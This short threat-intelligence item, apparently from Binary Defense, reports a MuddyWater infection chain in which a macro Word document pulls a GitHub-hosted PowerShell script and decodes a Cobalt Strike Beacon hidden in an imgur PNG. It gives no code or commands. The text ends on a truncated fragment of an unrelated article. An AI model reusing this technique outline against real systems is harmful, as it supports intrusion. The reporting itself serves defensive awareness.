A new sample associated with MuddyWater, an Advanced Persistent Threat (APT) group that has been known to target organizations in Middle Eastern countries, has been discovered utilizing stenography and a script hosted on GitHub as part of a malware infection chain. According to Bleeping Computer, the attack begins with a malicious Word document with macro code that will pull a PowerShell script hosted on Github and execute to start the next steps to steganography. The PowerShell script downloads a PNG image from the legitimate image hosting site imgur.com. It runs multiple math operations against the pixel values in the PNG image to decode a Cobalt Strike Beacon, a legitimate red team tool that has also been used extensively by threat actors. Once the PNG is decoded, another PowerShell script is run, which will load shellcode into memory and execute the Beacon to allow the attackers remote access to the target machine.
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense Russia’s invasion of Ukraine increased